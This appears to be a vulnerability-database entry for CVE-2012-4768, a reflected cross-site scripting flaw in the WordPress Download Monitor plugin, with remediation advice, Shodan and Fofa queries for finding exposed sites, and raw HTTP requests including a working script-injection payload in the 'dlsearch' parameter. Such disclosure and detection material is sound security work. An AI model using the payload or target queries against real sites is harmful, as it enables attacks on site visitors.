🔙 목록으로 돌아가기

CVE-2012-4768: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting

TitleWordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpdate to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.
CVSS Score4.3
EPSS Score0.01936
CVE IDCVE-2012-4768
CWE IDCWE-79
Shodan Queryhttp.html:"/wp-content/plugins/download-monitor/"
Fofa Querybody="/wp-content/plugins/download-monitor/"
Tags cve cve2012 xss wp-plugin packetstorm wordpress mikejolley vuln

🔍 Vulnerability Description

A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.

🌐 HTTP Request

GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13) AppleWebKit/619.4 (KHTML, like Gecko) Version/16.1.13 Safari/619.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-4768.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-4768.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A